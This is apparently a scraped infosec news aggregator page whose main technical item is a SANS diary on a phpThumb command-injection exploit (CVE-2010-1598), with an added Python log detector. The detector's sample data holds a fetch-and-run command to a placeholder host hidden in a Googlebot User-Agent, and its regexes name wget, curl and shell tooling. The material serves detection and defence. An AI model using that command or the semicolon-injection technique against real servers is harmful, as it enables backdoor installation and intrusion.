Hackin9

InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Google CEO Larry Page published a long public letter on Thursday that gives an update on the company's strategy and highlights some of the conflicts he faces after a year at the head of the company.
 
Intel has started shipping a new series of small-capacity solid-state drives (SSDs) that can be used in laptops to reduce boot times and load applications more quickly.
 
Microsoft's six bulletins include critical server repairs, Internet Explorer updates and a critical update of its .NET Framework.

 
What can Netflix teach enterprises about data center operations and always-on reliability? Netflix is a consumer-facing Web shop with only a few applications--a completely different infrastructure challenge, right? Wrong. CIO.com's Bernard Golden explains the lessons to be learned from Netflix's data center transformation.
 
At one point last year, it looked as if the popular open-source MySQL database was in danger of having no user conference. Now it has two.
 
Facebook will list its stock on the NASDAQ stock exchange following what some observers say is the most anticipated IPO in a decade, according to a report today in the New York Times.
 
Cloud networking startup Pertino Networks announced this week that it has finalized a Series A round of funding in cooperation with Norwest Venture Partners and Lightspeed Venture Partners.
 
IBM and Red Hat could soon be joining the ranks of OpenStack supporters, giving the open source cloud project a big boost.
 
It's been an interesting past few weeks for OpenStack.
 
The online feminist group Ultraviolet launched a petition on Thursday demanding that Facebook appoint a woman to its all-male board before it becomes a publicly traded company.
 
The Jumpstart Our Business Startups Act has some provisions that will directly impact Rally Software, especially if it decides to go public, says CEO Tim Miller.
 
If I use the term "Ultrabook," you picture a very particular kind of laptop, don't you? It's super thin, sleek, and light. It's small enough to fit in a small shoulder bag or large purse...something very much like the Macbook Air. This is the image Intel has tried to cultivate for its Ultrabook brand. If you go to Intel's own Ultrabook site, you see a rendered faux-laptop that could almost be mistaken for Apple's. What about a 15.6-inch laptop that weighs as much as a Macbook Air, iPad, and smartphone combined? Would you call that an Ultrabook? Intel would.
 
This topic has come up before, but it is probably worthwhile noting that, of course, any data provided by the user can be used against a web application, not just proper POST and GET data. For example, we had a couple of readers point us to a recent blog post on SQL injection in HTTP headers [1] and how many web application vulnerability scanners miss them.
Another reader (Thanks Ovi!) sent us an interesting example hiding the exploit in the browser's user agent field. The exploit is directed at the infamous phpThumb tool, and again, isn't new (see for example the post by Spiderlabs [2]). The vulnerability was discovered originally in 2010 and assigned CVE-2010-1598. The bug wasn't fixed until about a year ago, when version 1.7.10 of phpThumb was released [3].
Let's take a quick look at the mechanics of this exploit and the vulnerability. First of all, the exploit's User-Agent (I formatted it for readability, but the pel command, which IMHO is a typo, came from the original):


[... second attempt in same user agent omitted ...]
Googlebot/2.1 (+http://www.google.com/bot.html)


In essence, the script appears to install some form of backdoor. The original server the exploit connected to is no longer accepting requests, so we couldn't test it. The script uses wget as well as curl to download the file, in case one of these tools is not installed.
Now here comes the interesting part: the User-Agent is actually not used by phpThumb. Instead, the actual exploit happens in the POST data (which is why you still see the POST method used). However, the POST data is somewhat validated and may not contain the full exploit script. Instead, the function executed via the POST data refers to the HTTP_USER_AGENT environment variable, pulls its content and executes it. Some of the other discussions of this bug miss this important aspect of the exploit.
Here is a quick outline of the code, and what went wrong:
First of all, the fltr parameter is parsed. Multiple filters may be provided, but for the purpose of this exploit, one is all it takes. Each filter contains a command and a parameter, delimited by a pipe (|).
Don't get your hopes up based on the name of the function (SafeExec). Its main purpose is to figure out which of the various ways of executing code is allowed.
The only hurdle the attacker has to overcome is to create an exploit that will first run the ImageMagick command successfully, then append the malicious command with a semicolon. The semicolon is never filtered. Many of these exploits don't even bother with the additional user agent obfuscation. The Googlebot part of the header is likely only included to sneak past weak web application firewall configurations that may ignore traffic from Google (the IP address this exploit came from is not associated with Google).
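As an added example (not part of the original diary, nor phpThumb's own code), here is a small Python detector that scans constructed access-log lines for the two observables the diary describes: a command separator inside phpThumb's fltr parameter, and download tooling in a User-Agent that hides behind a Googlebot token. The log lines, the host bad.example and the heuristic regexes are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A phpThumb filter is "command|parameter"; a command separator inside it is hostile.
FLTR_META_RE = re.compile(r'(;|`|\$\(|&&|\|\|)')
# Semicolons are normal in browser User-Agents, so look for tooling instead (heuristic, assumed).
SHELL_CMD_RE = re.compile(r'(`|\$\(|\bwget\b|\bcurl\b|/bin/sh\b|\bchmod\b|\bsh\s+/)')

def parse_line(line):
    """Split one combined-format access-log line into its fields, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def tainted_filters(path):
    """fltr values (phpThumb accepts fltr and fltr[]) carrying a command separator."""
    qs = parse_qs(urlsplit(path).query)
    values = qs.get('fltr', []) + qs.get('fltr[]', [])
    return [v for v in values if FLTR_META_RE.search(v)]

def analyze(line):
    """Return findings for one log line; an empty list means nothing suspicious."""
    rec = parse_line(line)
    if rec is None:
        return ['unparseable line']
    findings = []
    if 'phpthumb' in rec['path'].lower():
        bad = tainted_filters(rec['path'])
        if bad:
            findings.append('command separator in fltr: %r' % bad)
        if rec['method'] == 'POST':
            # The access log never records the body, so the fltr value is invisible here.
            findings.append('POST to phpThumb: fltr not in access log, inspect request body')
    if SHELL_CMD_RE.search(rec['ua']):
        findings.append('shell tooling in User-Agent: %r' % rec['ua'])
        if 'Googlebot' in rec['ua']:
            findings.append('Googlebot token attached to a hostile User-Agent (likely WAF evasion)')
    return findings

# Constructed sample traffic (not real logs); bad.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Apr/2012:10:00:01 +0000] "GET /phpThumb.php?src=a.jpg&fltr[]=blur|5 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/11.0"',
    '203.0.113.9 - - [06/Apr/2012:10:00:02 +0000] "GET /phpThumb.php?src=a.jpg&fltr[]=blur|5%3Bid HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Apr/2012:10:00:03 +0000] "POST /phpThumb.php HTTP/1.1" 200 512 "-" '
    '"wget http://bad.example/x -O /tmp/x;sh /tmp/x; Googlebot/2.1 (+http://www.google.com/bot.html)"',
]
```

Because the body of a POST is not in the access log, the third line can only be flagged by its User-Agent; a WAF or application-level log that captures the fltr value is needed to see the ImageMagick-plus-semicolon part.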
[1] http://resources.infosecinstitute.com/sql-injection-http-headers/

[2] http://blog.spiderlabs.com/2011/12/honeypot-alert-user-agent-field-arbitrary-php-code-execution.html

[3] http://phpthumb.sourceforge.net/demo/docs/phpthumb.changelog.txt
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

 
Two employees of Indian outsourcer Tata Consultancy Services (TCS) have won class action status for a lawsuit alleging that the company made deductions from their wages in breach of their contract while they were working in the U.S. A judge in the U.S. District Court for the Northern District of California granted their suit class action status on Monday.
 
Earlier this week, Instagram--the beloved iPhone app for snapping, filtering, and sharing photographs--arrived on Android phones, nearly a year and half after the iPhone app's initial release. Until that time, folks using Android phones could only look on longingly as their iPhone-wielding friends snapped and shared photos on the growing network, which topped 30 million members before making the leap to Android.
 
President Barack Obama has signed legislation that eliminates restrictions preventing entrepreneurs from seeking crowdsourced funding online and removes some other financial regulations for small businesses.
 
It would seem the missing iPhone prototype wasn't "priceless," after all. Apple has apparently reached an out-of-court settlement to keep a San Francisco man from suing the company over what his attorney -- and virtually everyone else -- called an "outrageous" warrantless search of the man's home, car and computer last summer by two Apple employees accompanied by four city police officers.
 
Cisco has rolled out a new line of home Wi-Fi routers that embed application intelligence for managing devices connected to the home network.
 
Multiple Toshiba e-Studio Devices Security Bypass Vulnerability
 
Nokia's Lumia 900 smartphones will reach AT&T stores on Sunday for $99.99, and one analyst said it could be the start of something big: Windows Phone as a market disrupter between the successful iPhone and Android phones.
 
Complaints from owners of Apple's newest iPad that their device has trouble connecting to wireless networks continue to mount.
 
Think that coffee-shop Wi-Fi hotspot is secure? Think again. Most public hotspots, including those at airports, hotels, and even Starbucks, aren't secure at all. In fact, when your laptop connects to one of these networks, it's easy pickings for hackers -- even if you have a firewall installed.
 
Microsoft said it would issue six security updates next week, four of them critical, to patch 11 bugs in Windows, Internet Explorer, Office, SQL Server and its virtual private networking platform.
 
PC maker Eurocom has crammed some of the latest server technologies, including an eight-core Intel Xeon processor, into a laptop that the company calls a "mobile server."
 
I have a degree in Linguistics. (But I have a job anyway! Rimshot!) So I have some training in arguing about semantics.
 
Hewlett-Packard CEO Meg Whitman's bruising run for governor of California left her with a quality that she needs as she seeks to turn around the computer giant: very "thick skin," she told the Simmons Leadership Conference in Boston on Thursday.
 
If you want to know what to buy, talk to people who've adopted the technology you're eyeing. Here are key questions to ask. Insider (registration required)
 
[security bulletin] HPSBUX02760 SSRT100805 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
 
[security bulletin] HPSBUX02758 SSRT100774 rev.1 - HP-UX running DCE, Remote Denial of Service (DoS)
 
[waraxe-2012-SA#083] - Multiple Vulnerabilities in Uploadify 2.1.4
 
[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0
 
[security bulletin] HPSBUX02757 SSRT100779 rev.2 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
 
A U.S. appeals court has resurrected a US$1 billion copyright case filed by Viacom against YouTube by sending the case back to trial by a jury.
 
Ubuntu developer Canonical is working on a new provisioning platform called Metal as a Service (MAAS), which will be used to activate new servers, on top of which a cloud can be deployed, founder Mark Shuttleworth said in a blog post.
 
Wordpress taggator plugin Sql Injection Vulnerabilities
 
Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite
 
Sony Bravia Remote Denial of Service - CVE-2012-2210
 

It can't always be about hugging and grabbing an ice cream cone
CSO (blog)
A friend from another publication covered a panel discussion at the 2012 InfoSec World Conference and Expo yesterday, causing some controversy with his story. He wrote of conference attendees feeling insulted by the frank talk on the panel.

 
If you spend time online as part of your daily routine, you know that staying productive while browsing the Web is a challenge. Fortunately some great websites and browser extensions are available to help transform your browser into one of the most powerful productivity tools in your arsenal. Elsewhere we've discussed how to avoid tech distractions in your daily life; in this article we'll discuss three of the most popular productivity and time management systems, along with some great browser modifications to help you stick to them.
 
Dell plans to acquire Make Technologies, which specializes in helping businesses replace outdated IT systems, the company said Thursday, marking its third enterprise-related acquisition announcement this week.
 
The Windows Registry is a powerful but confusing component of the Windows operating system. In earlier editions of Windows, editing the Registry was fraught with peril; if the user edited it with the wrong tool or altered a critical key, the result could be an inoperable Windows installation. Windows 7, however, is far more forgiving than its predecessors when it comes to modifying the Registry, if you use the built-in Windows 7 Registry Editor (Regedit).
 
More than 600,000 Macs have been infected with a new version of the Flashback Trojan horse that's being installed on people's computers with the help of Java exploits, security researchers from Russian antivirus vendor Doctor Web said on Wednesday.
 
The takedown of Edward Pearson is said to be part of a larger crackdown on cybercrime in the UK.
 
iPhoto for iOS is not only a joy to use, it's easy to learn--even if you've never used the desktop version of iPhoto '11.
 
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite
 
[MATTA-2012-001] CVE-2012-1301; 0day; Open Proxy vulnerability in Umbraco 4.7
 
[ MDVSA-2012:054 ] libtiff
 
Re: Arbor Networks Peakflow SP web interface XSS
 
Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

--

Adam Swanger, Web Developer (GWEB, GWAPT)

Internet Storm Center https://isc.sans.edu

 

BOSTON — Privacy is a fog rolling in over the land. That’s how Jeff Northrup, IT director of the International Association of Privacy, described personal information privacy during his presentation at the SecureWorld conference last week. The fog is thick over some countries, especially in Europe, and rather light over the U.S., but that will change soon. Northrup advised IT professionals in the U.S. to draw a map through the fog now to avoid crashing into problems and penalties later. 

 

Evidence of a rapidly changing data privacy landscape is plentiful. The Obama administration just released its U.S. Privacy Bill of Rights, which would grant individuals more control over how their information is collected and managed, and increase transparency in privacy policies. Many observers believe it has a good chance of becoming law. Also, the FTC recently slapped Google and Facebook with penalties after users complained of privacy abuses; Google will now undergo 20 years of independent privacy audits, and Facebook may face similar chastisement from the FTC.

 

These incidents are just a few of the signs that security professionals need to amp up privacy projects before their organizations run afoul of current or future U.S. data privacy laws. Where to start? Northrup suggested organizations take an inventory of every piece of personal information they collect, and note why it is collected and where it is stored. This can be a daunting task, but many organizations already have some of the pieces in place as part of their compliance programs or DLP projects. Any information that does not have a clear business purpose (and the marketing team’s desire to send email blasts to a million relative strangers does not count as a “business purpose”) should be deleted or stored only on an as-needed, transient basis.

 

By taking steps toward greater transparency and giving users more control over how their information is used, organizations will be better prepared to navigate out of the fog.



 

SANS Secure Europe 2012
TechWeekEurope UK
SANS Secure Europe 2012, one of the region's largest infosec training events, will be offering a new course this year to help business and technical staff learn the fundamentals of the audit process, governance, and compliance regulations, ...
 
Oracle CEO Larry Ellison said his company will continue to bet on selling high-end custom hardware for its software products, even amidst a growing trend toward roomfuls of cheap, generic servers.
 
With competition heating up in open source clouds, an analysis of community participation among four major projects shows that Eucalyptus - the oldest of those studied - has the largest standing community but OpenStack and CloudStack are gaining momentum in the developer community.
 
A total of 439 million households around the world had installed a Wi-Fi-based home network at the end of 2011, equivalent to 25% of all households, according to market research company Strategy Analytics.
 
Over the past few weeks I have been thinking good and hard about all this and how much time, effort, and funds it has taken to get where it has.


 
Some of the largest names in the tech industry are funding patent 'trolls,' for protection from lawsuits and for access to the patent pool.
 
Google is deprecating the Master/Slave Datastore used by its cloud platform App Engine in favor of the High-Replication Datastore (HRD), which offers better reliability, the company said.
 
Samsung Electronics has started mass producing a microSD card that uses an Ultra High Speed-1 (UHS-1) interface to improve data transfer speeds, the company said on Wednesday.
 
IT managers faced with constrained budgets and a dearth of employees with technology skills are turning to cross-training programs to help develop workers with multiple skills.
 
The Obama administration's recent call for new codes of conduct for handling private consumer data on the Internet has evoked sharply different, if somewhat predictable, responses from rights groups and industry stakeholders.
 
Wireless carriers recently began offering LTE-ready phones at bargain-basement prices of less than $100, but those customers still must commit to paying a minimum of $60 a month, or $1,440 for two years of voice and data service.
 
libTIFF CVE-2012-1173 Remote Code Execution Vulnerability
 

SecureNinja Continues to Expand into International Markets by Appointing ...
Virtual-Strategy Magazine
Through this partnership, Sandline will be able to offer SecureNinja's extensive suite of InfoSec services and training offerings in Romania, as well as in the region. “We are proud to be appointed by SecureNinja as one of their official ...

 

SecureNinja Continues to Expand into International Markets by Appointing ...
PR Web (press release)
Through this partnership, Sandline will be able to offer SecureNinja's extensive suite of InfoSec services and training offerings in Romania, as well as in the region. “We are proud to be appointed by SecureNinja as one of their official ...

 